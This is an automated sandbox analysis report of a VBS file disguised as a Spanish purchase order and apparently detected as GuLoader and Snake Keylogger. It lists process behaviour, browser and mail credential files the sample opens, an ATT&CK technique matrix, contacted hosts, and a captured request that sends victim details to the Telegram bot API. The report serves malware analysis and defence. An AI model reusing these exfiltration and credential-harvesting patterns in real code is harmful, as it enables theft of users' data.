              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\SysWOW64\msiexec.exe VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 00000007.00000002.2618677308.00000000251F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: 00000007.00000002.2618677308.00000000251F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information221
              Scripting
              Valid Accounts1
              Windows Management Instrumentation
              221
              Scripting
              1
              DLL Side-Loading
              3
              Obfuscated Files or Information
              1
              OS Credential Dumping
              1
              File and Directory Discovery
              Remote Services1
              Archive Collected Data
              1
              Web Service
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              Exploitation for Client Execution
              1
              DLL Side-Loading
              311
              Process Injection
              1
              Software Packing
              LSASS Memory13
              System Information Discovery
              Remote Desktop Protocol1
              Data from Local System
              3
              Ingress Tool Transfer
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts2
              Command and Scripting Interpreter
              Logon Script (Windows)Logon Script (Windows)1
              DLL Side-Loading
              Security Account Manager1
              Security Software Discovery
              SMB/Windows Admin Shares1
              Email Collection
              11
              Encrypted Channel
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts2
              PowerShell
              Login HookLogin Hook1
              Masquerading
              NTDS1
              Process Discovery
              Distributed Component Object ModelInput Capture3
              Non-Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script21
              Virtualization/Sandbox Evasion
              LSA Secrets21
              Virtualization/Sandbox Evasion
              SSHKeylogging14
              Application Layer Protocol
              Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts311
              Process Injection
              Cached Domain Credentials1
              Application Window Discovery
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync1
              System Network Configuration Discovery
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1540334 Sample: Distribuciones Enelca Ja#U0... Startdate: 23/10/2024 Architecture: WINDOWS Score: 100 23 reallyfreegeoip.org 2->23 25 api.telegram.org 2->25 27 4 other IPs or domains 2->27 39 Found malware configuration 2->39 41 Malicious sample detected (through community Yara rule) 2->41 43 Multi AV Scanner detection for submitted file 2->43 49 6 other signatures 2->49 8 powershell.exe 18 2->8         started        11 wscript.exe 1 2->11         started        signatures3 45 Tries to detect the country of the analysis system (by using the IP) 23->45 47 Uses the Telegram API (likely for C&C communication) 25->47 process4 signatures5 51 Early bird code injection technique detected 8->51 53 Writes to foreign memory regions 8->53 55 Found suspicious powershell code related to unpacking or dynamic code loading 8->55 57 Queues an APC in another process (thread injection) 8->57 13 msiexec.exe 15 8 8->13         started        17 conhost.exe 8->17         started        59 VBScript performs obfuscated calls to suspicious functions 11->59 61 Suspicious powershell command line found 11->61 63 Wscript starts Powershell (via cmd or directly) 11->63 65 2 other signatures 11->65 19 powershell.exe 14 18 11->19         started        process6 dnsIp7 29 api.telegram.org 149.154.167.220, 443, 49996 TELEGRAMRU United Kingdom 13->29 31 reallyfreegeoip.org 188.114.96.3, 443, 49980, 49981 CLOUDFLARENETUS European Union 13->31 33 checkip.dyndns.com 193.122.6.168, 49979, 49982, 49984 ORACLE-BMC-31898US United States 13->33 67 Tries to steal Mail credentials (via file / registry access) 13->67 69 Tries to harvest and steal browser information (history, passwords, etc) 13->69 35 drive.google.com 142.250.185.206, 443, 49740, 49970 GOOGLEUS United States 19->35 37 drive.usercontent.google.com 142.250.185.65, 443, 49746, 49977 GOOGLEUS United States 19->37 71 Found suspicious powershell code related to unpacking or dynamic code loading 19->71 21 conhost.exe 19->21         started        signatures8 process9

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              Distribuciones Enelca Ja#U00e9n, S.L. PEDIDO 456799.vbs18%ReversingLabsScript.Trojan.GuLoader
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              http://nuget.org/NuGet.exe0%URL Reputationsafe
              http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
              https://go.micro0%URL Reputationsafe
              https://contoso.com/License0%URL Reputationsafe
              https://contoso.com/Icon0%URL Reputationsafe
              http://checkip.dyndns.org/0%URL Reputationsafe
              https://aka.ms/pscore6lB0%URL Reputationsafe
              https://contoso.com/0%URL Reputationsafe
              https://nuget.org/nuget.exe0%URL Reputationsafe
              https://aka.ms/pscore680%URL Reputationsafe
              https://apis.google.com0%URL Reputationsafe
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              s-part-0044.t-0009.fb-t-msedge.net
              13.107.253.72
              truefalse
                unknown
                drive.google.com
                142.250.185.206
                truefalse
                  unknown
                  drive.usercontent.google.com
                  142.250.185.65
                  truefalse
                    unknown
                    reallyfreegeoip.org
                    188.114.96.3
                    truetrue
                      unknown
                      api.telegram.org
                      149.154.167.220
                      truetrue
                        unknown
                        checkip.dyndns.com
                        193.122.6.168
                        truefalse
                          unknown
                          checkip.dyndns.org
                          unknown
                          unknowntrue
                            unknown
                            NameMaliciousAntivirus DetectionReputation
                            https://reallyfreegeoip.org/xml/173.254.250.90false
                              unknown
                              http://checkip.dyndns.org/false
                              • URL Reputation: safe
                              unknown
                              https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:818225%0D%0ADate%20and%20Time:%2024/10/2024%20/%2003:15:28%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20818225%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                                unknown
                                NameSourceMaliciousAntivirus DetectionReputation
                                http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.1522950843.0000028F64B54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1704835374.0000000005518000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://drive.usercontent.google.compowershell.exe, 00000002.00000002.1497034651.0000028F56895000.00000004.00000800.00020000.00000000.sdmpfalse
                                  unknown
                                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000005.00000002.1688588153.0000000004608000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000005.00000002.1688588153.0000000004608000.00000004.00000800.00020000.00000000.sdmpfalse
                                    unknown
                                    https://go.micropowershell.exe, 00000002.00000002.1497034651.0000028F55712000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://contoso.com/Licensepowershell.exe, 00000005.00000002.1704835374.0000000005518000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://contoso.com/Iconpowershell.exe, 00000005.00000002.1704835374.0000000005518000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://drive.googPpowershell.exe, 00000002.00000002.1497034651.0000028F56857000.00000004.00000800.00020000.00000000.sdmpfalse
                                      unknown
                                      https://drive.usercontent.googhpowershell.exe, 00000002.00000002.1497034651.0000028F56882000.00000004.00000800.00020000.00000000.sdmpfalse
                                        unknown
                                        http://drive.google.compowershell.exe, 00000002.00000002.1497034651.0000028F5685C000.00000004.00000800.00020000.00000000.sdmpfalse
                                          unknown
                                          https://chrome.google.com/webstore?hl=enmsiexec.exe, 00000007.00000002.2618677308.00000000253A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                            unknown
                                            https://chrome.google.com/webstore?hl=en8msiexec.exe, 00000007.00000002.2618677308.00000000253A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                              unknown
                                              https://github.com/Pester/Pesterpowershell.exe, 00000005.00000002.1688588153.0000000004608000.00000004.00000800.00020000.00000000.sdmpfalse
                                                unknown
                                                https://www.google.compowershell.exe, 00000002.00000002.1497034651.0000028F56882000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1497034651.0000028F5685C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1497034651.0000028F5687E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1497034651.0000028F54F73000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  unknown
                                                  https://aka.ms/pscore6lBpowershell.exe, 00000005.00000002.1688588153.00000000044B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://contoso.com/powershell.exe, 00000005.00000002.1704835374.0000000005518000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.1522950843.0000028F64B54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1704835374.0000000005518000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://chrome.google.com/webstore?hl=enlBmsiexec.exe, 00000007.00000002.2618677308.00000000253AB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    unknown
                                                    https://drive.google.compowershell.exe, 00000002.00000002.1497034651.0000028F54D07000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1497034651.0000028F56857000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      unknown
                                                      https://drive.usercontent.google.compowershell.exe, 00000002.00000002.1497034651.0000028F56882000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1497034651.0000028F54F77000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        unknown
                                                        https://aka.ms/pscore68powershell.exe, 00000002.00000002.1497034651.0000028F54AE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://apis.google.compowershell.exe, 00000002.00000002.1497034651.0000028F56882000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1497034651.0000028F5685C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1497034651.0000028F5687E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1497034651.0000028F54F73000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.1497034651.0000028F54AE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1688588153.00000000044B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        • No. of IPs < 25%
                                                        • 25% < No. of IPs < 50%
                                                        • 50% < No. of IPs < 75%
                                                        • 75% < No. of IPs
                                                        IPDomainCountryFlagASNASN NameMalicious
                                                        149.154.167.220
                                                        api.telegram.orgUnited Kingdom
                                                        62041TELEGRAMRUtrue
                                                        142.250.185.206
                                                        drive.google.comUnited States
                                                        15169GOOGLEUSfalse
                                                        193.122.6.168
                                                        checkip.dyndns.comUnited States
                                                        31898ORACLE-BMC-31898USfalse
                                                        188.114.96.3
                                                        reallyfreegeoip.orgEuropean Union
                                                        13335CLOUDFLARENETUStrue
                                                        142.250.185.65
                                                        drive.usercontent.google.comUnited States
                                                        15169GOOGLEUSfalse
                                                        Joe Sandbox version:41.0.0 Charoite
                                                        Analysis ID:1540334
                                                        Start date and time:2024-10-23 17:21:58 +02:00
                                                        Joe Sandbox product:CloudBasic
                                                        Overall analysis duration:0h 7m 39s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:full
                                                        Cookbook file name:default.jbs
                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                        Number of analysed new started processes analysed:12
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:0
                                                        Technologies:
                                                        • HCA enabled
                                                        • EGA enabled
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Analysis stop reason:Timeout
                                                        Sample name:Distribuciones Enelca Ja#U00e9n, S.L. PEDIDO 456799.vbs
                                                        renamed because original name is a hash value
                                                        Original Sample Name:Distribuciones Enelca Jan, S.L. PEDIDO 456799.vbs
                                                        Detection:MAL
                                                        Classification:mal100.troj.spyw.expl.evad.winVBS@8/7@5/5
                                                        EGA Information:Failed
                                                        HCA Information:
                                                        • Successful, ratio: 94%
                                                        • Number of executed functions: 103
                                                        • Number of non-executed functions: 5
                                                        Cookbook Comments:
                                                        • Found application associated with file extension: .vbs
                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                        • Excluded domains from analysis (whitelisted): azurefd-t-fb-prod.trafficmanager.net, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                        • Execution Graph export aborted for target msiexec.exe, PID 4104 because it is empty
                                                        • Execution Graph export aborted for target powershell.exe, PID 1516 because it is empty
                                                        • Execution Graph export aborted for target powershell.exe, PID 7924 because it is empty
                                                        • Not all processes where analyzed, report is missing behavior information
                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                        • VT rate limit hit for: Distribuciones Enelca Ja#U00e9n, S.L. PEDIDO 456799.vbs
                                                        TimeTypeDescription
                                                        11:22:58API Interceptor87x Sleep call for process: powershell.exe modified
                                                        11:23:51API Interceptor4641x Sleep call for process: msiexec.exe modified
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        149.154.167.220Pedido de Cota#U00e7#U00e3o-24100004_lista comercial.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                          eFo07GvEf0.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            Ziraat Bankasi Swift Mesaji,pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                              AmountXpayable.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                FINAL SHIPPING DOCS.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                  CLOSURE.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    REVISED INVOICE.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                      Inquiry N_ TM23-10-00.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        https://www.google.co.nz/url?q=nL206935ZEtyvV206935l&sa=t&url=amp/%69%70%66%6F%78%2E%63%6F%2E%75%6B%2F%70%61%67%65%73%2F%74%68%61%6E%6B%73%2E%68%74%6D%6C#cnlhbi5zcGVuY2VyQHVzLnlhemFraS5jb20=Get hashmaliciousHTMLPhisherBrowse
                                                                          NEW ORDER QUOTATION REQUEST.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            193.122.6.168InvoiceXCopy.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                                            • checkip.dyndns.org/
                                                                            Ziraat Bankasi Swift Mesaji,pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • checkip.dyndns.org/
                                                                            AmountXpayable.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • checkip.dyndns.org/
                                                                            CLOSURE.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • checkip.dyndns.org/
                                                                            REVISED INVOICE.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • checkip.dyndns.org/
                                                                            Inquiry N_ TM23-10-00.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • checkip.dyndns.org/
                                                                            Q110450 SV51179-01.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • checkip.dyndns.org/
                                                                            #U304a#U898b#U7a4d#U308a#U4f9d#U983c.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                            • checkip.dyndns.org/
                                                                            SecuriteInfo.com.BackDoor.AgentTeslaNET.20.26809.8980.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • checkip.dyndns.org/
                                                                            z18QUOTES46789-OCT24.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                            • checkip.dyndns.org/
                                                                            188.114.96.3Doc 784-01965670.exeGet hashmaliciousFormBookBrowse
                                                                            • www.launchdreamidea.xyz/bd77/
                                                                            PO1268931024 - Bank Slip.exeGet hashmaliciousPureLog StealerBrowse
                                                                            • www.timizoasisey.shop/3p0l/
                                                                            BL.exeGet hashmaliciousFormBookBrowse
                                                                            • www.launchdreamidea.xyz/bd77/
                                                                            w49A5FG3yg.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                            • 733812cm.n9shteam.in/DefaultWordpress.php
                                                                            9XHFe6y4Dj.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                            • 733812cm.n9shteam.in/DefaultWordpress.php
                                                                            SecuriteInfo.com.Win32.MalwareX-gen.14607.6011.exeGet hashmaliciousUnknownBrowse
                                                                            • servicetelemetryserver.shop/api/index.php
                                                                            t1zTzS9a3r.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                            • abdulbek.top/externalvideoprotectdefaultsqlWindowsdlePrivate.php
                                                                            aQdB62N7SB.elfGet hashmaliciousShikitega, XmrigBrowse
                                                                            • main.dsn.ovh/dns/lovely
                                                                            QUOTATION_OCTQTRA071244PDF.scr.exeGet hashmaliciousUnknownBrowse
                                                                            • filetransfer.io/data-package/DyuQ5y15/download
                                                                            zygWTMeQC2.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                            • 138231cm.n9shteam.in/CpuApiprotectTemp.php
                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            reallyfreegeoip.orgPedido de Cota#U00e7#U00e3o-24100004_lista comercial.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                            • 188.114.96.3
                                                                            rp8s2rxD5lpuQAG.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                            • 188.114.97.3
                                                                            InvoiceXCopy.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                                            • 188.114.96.3
                                                                            eFo07GvEf0.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 188.114.96.3
                                                                            Pedido urgente_pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                            • 188.114.96.3
                                                                            Ziraat Bankasi Swift Mesaji,pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 188.114.96.3
                                                                            AmountXpayable.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 188.114.96.3
                                                                            FINAL SHIPPING DOCS.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                            • 188.114.97.3
                                                                            CLOSURE.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 188.114.97.3
                                                                            REVISED INVOICE.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 188.114.97.3
                                                                            checkip.dyndns.comPedido de Cota#U00e7#U00e3o-24100004_lista comercial.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                            • 193.122.130.0
                                                                            69-33-600 Kreiselkammer ER3.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                            • 132.226.247.73
                                                                            rp8s2rxD5lpuQAG.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                            • 193.122.130.0
                                                                            InvoiceXCopy.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                                            • 193.122.6.168
                                                                            eFo07GvEf0.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 132.226.247.73
                                                                            Pedido urgente_pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                            • 193.122.130.0
                                                                            Ziraat Bankasi Swift Mesaji,pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 193.122.6.168
                                                                            AmountXpayable.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 193.122.6.168
                                                                            FINAL SHIPPING DOCS.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                            • 132.226.8.169
                                                                            CLOSURE.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 158.101.44.242
                                                                            api.telegram.orgPedido de Cota#U00e7#U00e3o-24100004_lista comercial.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                            • 149.154.167.220
                                                                            eFo07GvEf0.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 149.154.167.220
                                                                            Ziraat Bankasi Swift Mesaji,pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 149.154.167.220
                                                                            AmountXpayable.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 149.154.167.220
                                                                            FINAL SHIPPING DOCS.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                            • 149.154.167.220
                                                                            CLOSURE.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 149.154.167.220
                                                                            REVISED INVOICE.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 149.154.167.220
                                                                            Inquiry N_ TM23-10-00.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 149.154.167.220
